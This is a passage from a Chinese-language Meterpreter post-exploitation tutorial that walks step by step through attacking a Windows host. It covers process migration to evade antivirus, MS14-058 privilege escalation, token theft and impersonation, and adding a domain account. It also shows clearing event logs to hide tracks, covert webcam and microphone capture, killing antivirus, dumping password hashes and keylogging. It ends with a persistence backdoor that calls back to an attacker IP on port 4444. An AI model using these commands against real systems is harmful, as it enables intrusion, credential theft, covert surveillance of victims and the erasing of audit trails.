\u5c06Meterpreter\u4f1a\u8bdd\u79fb\u690d\u5230\u8fdb\u7a0b\u6570\u4e3apid\u7684\u8fdb\u7a0b\u4e2d,\u9700\u8981\u6ce8\u610f\u7684\u662f\u5982\u679c\u5b58\u5728\u6740\u8f6f\u7684\u8bdd\u53ef\u80fd\u4f1a\u963b\u6b62\u8fdb\u7a0b\u6ce8\u5165\uff0c\u6240\u4ee5\u628a\u4f1a\u8bdd\u8fdb\u7a0b\u6ce8\u5165\u5230svchost.exe\u662f\u4e00\u4e2a\u597d\u65b9\u6cd5<\/p>\n\n\n\n<p>getprivs#\u5c3d\u53ef\u80fd\u83b7\u53d6\u5c3d\u53ef\u80fd\u591a\u7684\u7279\u6743<\/p>\n\n\n\n<p>getuid #\u83b7\u5f97\u5f53\u524d\u7684\u6743\u9650<\/p>\n\n\n\n<p>getsystem #\u901a\u8fc7\u5404\u79cd\u653b\u51fb\u5411\u91cf\u5c06\u4e00\u4e2a\u7ba1\u7406\u5e10\u6237\uff08\u901a\u5e38\u4e3a\u672c\u5730Administrator\u8d26\u6237\uff09\u63d0\u5347\u4e3a\u672c\u5730SYSTEM\u5e10\u6237<\/p>\n\n\n\n<p>getsystem \u2013h #\u5347\u7ea7\u6743\u9650SYSTEM\u8d26\u6237<\/p>\n\n\n\n<p>\u4f7f\u7528MS14-058\u4e4b\u7c7b\u7684Exp\u8fdb\u884c\u63d0\u6743:<\/p>\n\n\n\n<p>meterpreter &gt; background<\/p>\n\n\n\n<p>[*] Backgrounding session 3..<\/p>\n\n\n\n<p>msf exploit(handler) &gt; use exploit\/windows\/local\/ms14_058_track_popup_menu<\/p>\n\n\n\n<p>msf exploit(ms14_058_track_popup_menu) &gt; set SESSION 3<\/p>\n\n\n\n<p>use priv#\u52a0\u8f7d\u7279\u6743\u63d0\u5347\u6269\u5c55\u6a21\u5757\uff0c\u6765\u6269\u5c55Meterpreter\u5e93<\/p>\n\n\n\n<p>\u5217\u51fa\u8fdc\u7a0b\u673a\u5668\u7684\u8fdb\u7a0b\u548c\u8fdb\u7a0bID\u65b9\u4fbf\u8fc1\u79fb\u6211\u4eec\u7684\u8fdb\u7a0b\uff0c\u8fdb\u800c\u6539\u53d8\u6211\u4eec\u7684\u6743\u9650\u3002\u4f7f\u7528\u201cps\u201d\u547d\u4ee4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204651752.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025521537-532920416.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u5728\u5f97\u5230\u7684\u8fdb\u7a0b\u5217\u8868\u540e\uff0c\u53ef\u4ee5\u5b9e\u73b0\u8fc1\u79fb\u8fdb\u7a0b\uff0c\u7528getpid\u67e5\u770b\u5f53\u524d\u8fdb\u7a0b\u53f7\uff0c\u7136\u540e\u6839\u636e\u4e0a\u56fe\u65e2\u53ef\u4ee5\u77e5\u9053\u5f53\u524d\u7684\u6743\u9650\uff0c\u82e5\u518d\u7528migrate+pid\uff0c\u5c31\u4f1a\u8fc1\u79fb\u5230\u53e6\u4e00\u4e2a\u8fdb\u7a0b\u4e2d\uff0c\u7136\u540e\u6211\u4eec\u7684\u6743\u9650\u5c31\u6539\u53d8\u4e86\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204808980.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025521833-417713919.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112656607328.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025522066-1816048741.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>14.\u76d7\u53d6\u4ee4\u724c<\/p>\n\n\n\n<p>meterpreter &gt;use incognito&nbsp;&nbsp;&nbsp; \u52a0\u8f7dincoginto\u529f\u80fd\uff08\u7528\u6765\u76d7\u7a83\u76ee\u6807\u4e3b\u673a\u7684\u4ee4\u724c\u6216\u662f\u5047\u5192\u7528\u6237)<\/p>\n\n\n\n<p>meterpreter &gt;list_tokens -u&nbsp;&nbsp;&nbsp; \u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7528\u6237\u7684\u53ef\u7528\u4ee4\u724c<\/p>\n\n\n\n<p>meterpreter &gt;list_tokens -g&nbsp;&nbsp;&nbsp; \u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7528\u6237\u7ec4\u7684\u53ef\u7528\u4ee4\u724c<\/p>\n\n\n\n<p>meterpreter &gt;impersonate_token DOMAIN_NAME\\\\USERNAME&nbsp;&nbsp;&nbsp; \u5047\u5192\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u53ef\u7528\u4ee4\u724c,\u5982meterpreter &gt; impersonate_token QLWEB\\\\Administrato<\/p>\n\n\n\n<p>meterpreter &gt;execute -f cmd.exe -i -t #\u8c03\u7528\u57df\u6743\u9650shell<\/p>\n\n\n\n<p>meterpreter &gt; getuid<\/p>\n\n\n\n<p>meterpreter&gt;add_user 0xfa funny \u2013h192.168.3.98&nbsp; #\u5728\u57df\u63a7\u4e3b\u673a\u4e0a\u6dfb\u52a0\u8d26\u6237<\/p>\n\n\n\n<p>meterpreter&gt;reg command&nbsp;&nbsp; # \u5728\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868\u4e2d\u8fdb\u884c\u4ea4\u4e92\uff0c\u521b\u5efa\uff0c\u5220\u9664\uff0c\u67e5\u8be2\u7b49\u64cd\u4f5c<\/p>\n\n\n\n<p>meterpreter&gt;setdesktop number&nbsp;&nbsp; #\u5207\u6362\u5230\u53e6\u4e00\u4e2a\u7528\u6237\u754c\u9762\uff08\u8be5\u529f\u80fd\u57fa\u4e8e\u54ea\u4e9b\u7528\u6237\u5df2\u767b\u5f55\uff09<\/p>\n\n\n\n<p>meterpreter&gt;ps #\u67e5\u770b\u76ee\u6807\u673a\u5668\u8fdb\u7a0b\uff0c\u627e\u51fa\u57df\u63a7\u8d26\u6237\u8fd0\u884c\u7684\u8fdb\u7a0bID<\/p>\n\n\n\n<p>meterpreter&gt;steal_token pid #\u76d7\u7a83\u7ed9\u5b9a\u8fdb\u884c\u7684\u53ef\u7528\u4ee4\u724c\u5e76\u8fdb\u884c\u4ee4\u724c\u5047\u5192<\/p>\n\n\n\n<p>meterpreter&gt;drop_token pid #\u505c\u6b62\u5047\u5192\u5f53\u524d\u4ee4\u724c<\/p>\n\n\n\n<p>\u53e6\u4e00\u4e2a\u63d0\u6743\u7684\u65b9\u6cd5\u662f\u626e\u6f14\u4e00\u4e2a\u5e10\u6237\u4ece\u4e00\u4e2a\u7279\u5b9a\u8fdb\u7a0b\u5077\u53d6\u4ee4\u724c\u3002\u4e3a\u6b64\uff0c\u6211\u4eec\u9700\u8981\u201cincognito\u201d\u6269\u5c55\uff0c\u4f7f\u7528\u201csteal_token+PID\u201d\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\u6211\u4eec\u4f7f\u7528\u7684\u662fsteal_token 640\uff0c\u5176\u4e2d\u7531\u524d\u9762\u6267\u884cps\u540e\u5f97\u5230\u7684\u4fe1\u606f\u53ef\u77e5\uff0cPID\u4e3a640\u7684\u6743\u9650\u4e3aadministrator\uff0c\u6240\u4ee5\u6211\u4eec\u5728\u6267\u884c\u547d\u4ee4\u540e\u867d\u7136\u63d0\u793a\u9519\u8bef\u4fe1\u606f\uff0c\u4f46\u662f\u5b83\u4ecd\u4f1a\u88ab\u6210\u529f\u5728\u540e\u53f0\u6267\u884c\uff0c\u6240\u4ee5\u5728\u8fd0\u884csteal_token\u540e\u6838\u5b9eUID\uff0c\u6211\u4eec\u7684\u6743\u9650\u5c31\u53d8\u4e3a\u4e86administrator\u4e86\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205418940.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025522477-1093986046.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>load incognito<\/p>\n\n\n\n<p>list_tokens -u<\/p>\n\n\n\n<p>impersonate_token xxxxx\\\\xxxxxxx<\/p>\n\n\n\n<p>execute -f cmd.exe -i -t<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025523204-422095693.gif\" alt=\"20161006131139\"\/><\/figure>\n\n\n\n<p>15.\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n<p>\u5b8c\u6210\u653b\u51fb\u64cd\u4f5c\u4e4b\u540e\uff0c\u5343\u4e07\u522b\u5fd8\u4e86\u201c\u6253\u626b\u6218\u573a\u201d\u3002\u6211\u4eec\u7684\u6240\u6709\u64cd\u4f5c\u90fd\u4f1a\u88ab\u8bb0\u5f55\u5728\u76ee\u6807\u7cfb\u7edf\u7684\u65e5\u5fd7\u6587\u4ef6\u4e4b\u4e2d\uff0c\u56e0\u6b64\u6211\u4eec\u9700\u8981\u5728\u5b8c\u6210\u653b\u51fb\u4e4b\u540e\u4f7f\u7528\u547d\u4ee4\u201cclearev\u201d\u547d\u4ee4\u6765\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7<\/p>\n\n\n\n<p>\u6267\u884c\u201cclearev\u201d\u547d\u4ee4\uff0c\u5c06\u6e05\u9664\u4e8b\u4ef6\u65e5\u5fd7\u3002\u8fd9\u4e2a\u547d\u4ee4\u6ca1\u6709\u4efb\u4f55\u9009\u9879\u6216\u53c2\u6570\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205448912.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025523588-911056691.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u6267\u884c\u201cclearev\u201d\u547d\u4ee4\u540e\u6253\u5f00\u76ee\u6807\u673a\u5668\u7684\u4e8b\u4ef6\u67e5\u770b\u5668\u91cc\u9762\u7684\u5e94\u7528\u7a0b\u5e8f\u3001\u5b89\u5168\u6027\u3001\u7cfb\u7edf\u90fd\u662f\u662f\u7a7a\u7684\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205505534.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025524075-715674220.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>16.\u7f51\u7edc\u6444\u50cf\u5934<\/p>\n\n\n\n<p>record_mic\u3000\u3000\u3000&nbsp;#\u97f3\u9891\u5f55\u5236<\/p>\n\n\n\n<p>webcam_chat\u3000\u3000\u3000#\u67e5\u770b\u6444\u50cf\u5934\u63a5\u53e3<\/p>\n\n\n\n<p>webcam_list\u3000\u3000\u3000#\u67e5\u770b\u6444\u50cf\u5934\u5217\u8868<\/p>\n\n\n\n<p>webcam_stream\u3000\u3000#\u6444\u50cf\u5934\u89c6\u9891\u83b7\u53d6<\/p>\n\n\n\n<p>webcam_list<\/p>\n\n\n\n<p>meterpreter &gt; webcam_list<\/p>\n\n\n\n<p>1: Creative WebCam NX Pro<\/p>\n\n\n\n<p>2: Creative WebCam NX Pro (VFW)<\/p>\n\n\n\n<p>meterpreter &gt;<\/p>\n\n\n\n<p>webcam_snap<\/p>\n\n\n\n<p>meterpreter &gt; webcam_snap -h<\/p>\n\n\n\n<p>Usage: webcam_snap [options]<\/p>\n\n\n\n<p>OPTIONS:<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Help Banner<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -i &gt;opt&gt;&nbsp; The index of the webcam to use (Default: 1)<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -p &gt;opt&gt;&nbsp; The JPEG image path (Default: &#8216;gnFjTnzi.jpeg&#8217;)<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -q &gt;opt&gt;&nbsp; The JPEG image quality (Default: &#8217;50&#8217;)<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -v &gt;opt&gt;&nbsp; Automatically view the JPEG image (Default: &#8216;true&#8217;)<\/p>\n\n\n\n<p>meterpreter &gt;<\/p>\n\n\n\n<p>OPTIONS:<\/p>\n\n\n\n<p>-h:&nbsp;&nbsp;&nbsp; Displays the help information for the command<\/p>\n\n\n\n<p>-i opt:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If more then 1 web cam is connected, use this option to select the device to capture the<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; image from<\/p>\n\n\n\n<p>-p opt:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Change path and filename of the image to be saved<\/p>\n\n\n\n<p>-q opt:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The imagine quality, 50 being the default\/medium setting, 100 being best quality<\/p>\n\n\n\n<p>-v opt:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; By default the value is true, which opens the image after capture<\/p>\n\n\n\n<p>Example usage:<\/p>\n\n\n\n<p>meterpreter &gt; webcam_snap -i 1 -v false<\/p>\n\n\n\n<p>[*] Starting&#8230;<\/p>\n\n\n\n<p>[+] Got frame<\/p>\n\n\n\n<p>[*] Stopped<\/p>\n\n\n\n<p>Webcam shot saved to: \/root\/Offsec\/YxdhwpeQ.jpeg<\/p>\n\n\n\n<p>meterpreter &gt;<\/p>\n\n\n\n<p>\u201cwebcam_snap\u201d\u547d\u4ee4\u4e3a\u6293\u53d6\u76ee\u6807\u4e3b\u673a\u5f53\u524d\u7684\u6444\u50cf\u5934\u62cd\u6444\u5230\u7684\u753b\u9762\uff0c\u5e76\u5c06\u5b83\u4ee5\u56fe\u7247\u5f62\u5f0f\u4fdd\u5b58\u5230\u672c\u5730\uff0c\u201cwebcam_snap \u2013h\u201d\u547d\u4ee4\u4e3a\u67e5\u770b\u53c2\u6570\u7684\u4f7f\u7528\u65b9\u6cd5\u3002\u7531\u4e8e\u6211\u4eec\u7684\u5b9e\u9a8c\u4e2d\u76ee\u6807\u673a\u5668\u6ca1\u6709\u6444\u50cf\u5934\uff0c\u6240\u4ee5\u6211\u4eec\u8fd0\u884c\u201cwebcam_snap -i 1 -v false\u201d\u547d\u4ee4\u4e4b\u540e\u8fd4\u56de\u4ee5\u4e0b\u4fe1\u606f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210451895.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025524747-1503549059.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.offensive-security.com\/wp-content\/uploads\/2015\/05\/Webcam_snap.png\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025525584-244131491.gif\" alt=\"Using webcam_snap Meterpreter plugin | Metasploit Unleashed\"\/><\/a><\/figure>\n\n\n\n<p>17.\u4e00\u4e9b\u811a\u672c\u547d\u4ee4<\/p>\n\n\n\n<p>\u4e3a\u83b7\u53d6\u8fdc\u7a0b\u673a\u5668\u4e0a\u7684\u4fe1\u606f\uff0c\u5728meterpreter\u4e2d\u8fd8\u6709\u5f88\u591a\u811a\u672c\u53ef\u7528\uff0c\u505a\u66f4\u5927\u7684\u6e17\u900f\u6d4b\u8bd5\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528\u201crun scriptname\u201d\u6765\u4f7f\u7528meterpreter\u6a21\u5757\u4e2d\u7684\u811a\u672c\u547d\u4ee4<\/p>\n\n\n\n<p>(1)\u8c03\u7528post\/windows\/gather\/checkvm\u540e\u6e17\u900f\u6a21\u5757\uff0c\u786e\u5b9a\u76ee\u6807\u4e3b\u673a\u662f\u5426\u662f\u4e00\u53f0\u865a\u62df\u673a<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1a<\/p>\n\n\n\n<p>run&nbsp; post\/windows\/gather\/checkvm<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025525901-1405844404.gif\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210652303.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025526139-2122578152.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u540c\u6837\u6709\u8bb8\u591a\u7c7b\u4f3c\u8fd9\u6837\u7684\u811a\u672c\uff0c\u4e0b\u9762\u6765\u4ecb\u7ecd\u51e0\u4e2a\u91cd\u8981\u7684\u811a\u672c\uff1a<\/p>\n\n\n\n<p>(2) packetrecorder\u2014\u2014\u201crun packetrecorder\u201d\u67e5\u770b\u76ee\u6807\u7cfb\u7edf\u7684\u6240\u6709\u7f51\u7edc\u6d41\u91cf\uff0c\u5e76\u4e14\u8fdb\u884c\u6570\u636e\u5305\u8bb0\u5f55\uff0c-i 1\u6307\u5b9a\u8bb0\u5f55\u6570\u636e\u5305\u7684\u7f51\u5361\u3002<\/p>\n\n\n\n<p>\u4ece\u4e0b\u56fe\u4e2d\u8fd0\u884c\u4e4b\u540e\u8fd4\u56de\u7684\u4fe1\u606f\u4e2d\u53ef\u4ee5\u5230\u6211\u4eec\u9700\u8981\u67e5\u770b\u7684\u76ee\u6807\u7cfb\u7edf\u7684\u7f51\u7edc\u6d41\u91cf\u4fe1\u606f\u5c06\u88ab\u5b58\u50a8\u7684\u8def\u5f84\uff0c\u53ef\u4ee5\u5230\u4e0b\u9762\u8def\u5f84\u4e2d\u76f4\u63a5\u67e5\u770b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210843385.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025526561-148295478.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(3)get_local_subnets\u2014\u2014\u201crun get_local_subnets\u201d\u5f97\u5230\u672c\u5730\u5b50\u7f51\u7f51\u6bb5<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210859129.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025526861-247449583.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(4)getcountermeasure\u2014run getcountermeasure\u663e\u793aHIPS\u548cAV\u8fdb\u7a0b\u7684\u5217\u8868\uff0c\u663e\u793a\u8fdc\u7a0b\u673a\u5668\u7684\u9632\u706b\u5899\u89c4\u5219\uff0c\u5217\u51faDEP\u548cUAC\u7b56\u7565<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211515260.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025527508-1408864389.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(5) scraper\u2014\u2014\u201crun scraper\u201d\u4ece\u76ee\u6807\u4e3b\u673a\u83b7\u5f97\u6240\u6709\u7f51\u7edc\u5171\u4eab\u7b49\u4fe1\u606f<\/p>\n\n\n\n<p>\u5e76\u4e14\u83b7\u5f97\u7684\u8fd9\u4e9b\u6240\u6709\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5b58\u50a8\u5728\/root\/.msf4\/logs\/scripts\/scraper directory\u76ee\u5f55\u4e0b\u3002\u4f7f\u7528ls\u547d\u4ee4\u67e5\u770b\u5b58\u50a8\u7684\u8fd9\u4e9b\u6587\u4ef6\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211335625.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025528019-835896384.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211616826.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025528493-857423779.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(6) killav\u2014\u2014\u201crun killav\u201d\u547d\u4ee4\u7ec8\u6b62Av\u8fdb\u7a0b\uff0c\u53ef\u4ee5\u5f88\u5feb\u7684\u6e05\u9664\u6211\u4eec\u7684\u8def\u5f84\u548c\u6709\u6548\u6e17\u900f\u6d4b\u8bd5\u7684\u8bb0\u5f55<\/p>\n\n\n\n<p>\u4f46\u662f\u8fd9\u4e2a\u811a\u672c,\u4e0d\u80fd\u7edd\u5bf9\u5f97\u9003\u907f\u6740\u6bd2\u8f6f\u4ef6\uff0c\u4f46\u662f\u5982\u679c\u6210\u529f\u4e86\u5bf9\u88ab\u653b\u51fb\u8005\u4f1a\u662f\u4e00\u4e2a\u4e25\u91cd\u7684\u6253\u51fb\uff0c\u5bf9\u4ed6\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211629324.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025528724-876522895.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u4f7f\u7528\u4e86 \u201crun killav\u201d\u547d\u4ee4\u540exp\u4f1a\u7ec8\u6b62Av\u8fdb\u7a0b\u7136\u540e\u5f39\u51fa\u7a97\u53e3\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211642285.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025529165-1603667756.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(7)hashdump\u2014\u2014\u201crun hashdump\u201d\u83b7\u5f97\u5bc6\u7801\u54c8\u5e0c\u503c<\/p>\n\n\n\n<p>\u8fd0\u884c\u8fd9\u4e2a\u811a\u672c\u548c\u5728meterpreter\u4e0b\u76f4\u63a5\u8fd0\u884chashdump\u7ed3\u679c\u5dee\u4e0d\u591a\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211655906.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025529791-900583689.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(8)keylogrecorder\u2014\u2014\u201crun keylogrecorder\u201d\u547d\u4ee4\u4e3a\u8bb0\u5f55\u952e\u76d8\u4fe1\u606f<\/p>\n\n\n\n<p>\u8fd0\u884c\u8fd9\u4e2a\u811a\u672c\u548c\u5728meterpreter\u4e0b\u76f4\u63a5\u8fd0\u884ckeyscan\u7ed3\u679c\u5dee\u4e0d\u591a\uff0c\u8fd9\u91cc\u5c06\u5bf9\u952e\u76d8\u8bb0\u5f55\u7684\u6587\u4ef6\u8fdb\u884c\u4fdd\u5b58\uff0c\u8def\u5f84\u5982\u4e0b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211708139.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025530373-1128652177.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(9) persistence\u2014\u2014\u201crun persistence\u201d\u8fd9\u4e2a\u811a\u672c\u53ef\u4ee5\u88ab\u7528\u4f5c\u6301\u7eed\u6b3a\u9a97\u4e3b\u673a&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u8fdc\u7a0b\u4e3b\u673a\u91cd\u542f\u540e\u5c06\u5728\u7279\u5b9a\u7684\u65f6\u95f4\u95f4\u9694\u4fdd\u6301meterpreter\u4f1a\u8bdd<\/p>\n\n\n\n<p>run&nbsp; persistence -X -i&nbsp; 5&nbsp; -p 4444 -r 172.17.11.18&nbsp;&nbsp; #\u690d\u5165\u540e\u95e8<\/p>\n\n\n\n<p>-X \u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u5f00\u673a\u81ea\u542f\u52a8<\/p>\n\n\n\n<p>-i&nbsp; \u4e0d\u65ad\u5c1d\u8bd5\u53cd\u5411\u8fde\u63a5\u7684\u65f6\u95f4\u95f4\u9694<\/p>\n\n\n\n<p>persistence\u540e\u6e17\u900f\u6a21\u5757\u5411\u76ee\u6807\u4e3b\u673a\u690d\u5165\u540e\u95e8\u7a0b\u5e8f<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025530903-2135865795.gif\" alt=\"\" width=\"554\" height=\"228\"><br>\u6267\u884c\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n<p>\u521b\u5efa\u653b\u51fb\u8f7d\u8377-&gt;\u653b\u51fb\u8f7d\u8377\u690d\u5165\u5230\u76ee\u6807\u4e3b\u673ac:\\windows\\temp\u76ee\u5f55\u4e0b\uff0c\u662f\u4e00\u4e2a.vbs\u7684\u811a\u672c-&gt;\u5199\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868\u952e\u503c\u5b9e\u73b0\u5f00\u673a\u81ea\u52a8\u8fd0\u884c\u3002<br>\u4e0b\u56fe\uff0c\u5728\u653b\u51fb\u4e3b\u673a\u4e0a\u76d1\u542c4444\u7aef\u53e3\uff0c\u7b49\u5f85\u53cd\u5f39\u4f1a\u8bdd\u6210\u529f<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025531476-2044278912.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u4e0b\u56fe\uff0c\u770b\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868Run\u952e\u503c\u679c\u7136\u88ab\u5199\u5165\u4e86\u4e00\u4e2apDTizIlNK\u7684\u952e\u503c\uff0c\u6267\u884c\u540e\u95e8vbs\u811a\u672c<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025531856-360429167.gif\" alt=\"\" width=\"554\" height=\"224\"><\/p>\n\n\n\n<p>(10)enum_drives<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u662f\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\u5206\u533a\u4fe1\u606f\uff0c\u6211\u4eec\u5c31\u4ee5\u8fd9\u4e2a\u4f8b\u8bb2\u89e3\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u4f7f\u7528\u65b9\u6cd5\u3002<\/p>\n\n\n\n<p>\u540e\u6e17\u900f\u6a21\u5757post\/windows\/gather\/forensics\/enum_drives\u8c03\u7528<\/p>\n\n\n\n<p>\u5728\u83b7\u53d6meterpreter\u4f1a\u8bddsession\u540e\uff0c\u8c03\u7528post\/windows\/gather\/forensics\/enum_drives\uff0c\u53ef\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u5b58\u50a8\u5668\u4fe1\u606f\uff1a<\/p>\n\n\n\n<p>\u547d\u4ee4\uff0c\u5728msfconsole\u4e0b\uff1a<\/p>\n\n\n\n<p>use post\/windows\/gather\/forensics\/enum_drives<\/p>\n\n\n\n<p>set SESSION 